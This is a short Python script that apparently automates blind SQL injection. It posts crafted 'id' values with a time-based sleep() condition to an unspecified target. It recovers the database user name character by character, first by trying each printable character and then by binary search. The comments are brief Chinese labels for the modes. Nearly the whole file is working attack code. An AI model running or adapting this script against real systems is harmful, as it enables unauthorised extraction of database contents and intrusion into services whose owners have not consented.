import requests
from requests.adapters import HTTPAdapter
from string import printable

target = ''
result = ''
s = requests.session()
s.mount('http://', HTTPAdapter(max_retries=3))
s.mount('https://', HTTPAdapter(max_retries=3))

# 暴力
for i in range(1, 3000):
    for c in printable:
        # 时间
        payload = '''if((ascii(substr((select user()),{},1))={}), sleep(1), 1)'''.format(
            i, ord(c))
        payload = '-1 and {}-- '.format(payload)
        res = s.post(url=target, data={"id": payload})
        # print(res.text)
        if res.elapsed.total_seconds() > 0.5:
        # if "sign" in res.text: # 布尔
            result += c
            print(result)
            break

# 二分
for i in range(1, 3000):
    min_value = 33
    max_value = 127
    mid_value = (min_value + max_value) // 2
    while min_value < max_value:
        # 时间
        payload = '''if((ascii(substr((select user()),{},1))>{}), sleep(1), 1)'''.format(
            i, mid_value)
        payload = '-1 and {}-- '.format(payload)
        res = s.post(url=target, data={"id": payload})
        # print(res.text)
        if res.elapsed.total_seconds() > 0.5:
        # if "sign" in res.text: # 布尔
            min_value = mid_value + 1
        else:
            max_value = mid_value
        mid_value = (min_value + max_value) // 2

    result += chr(mid_value)
    print(result)

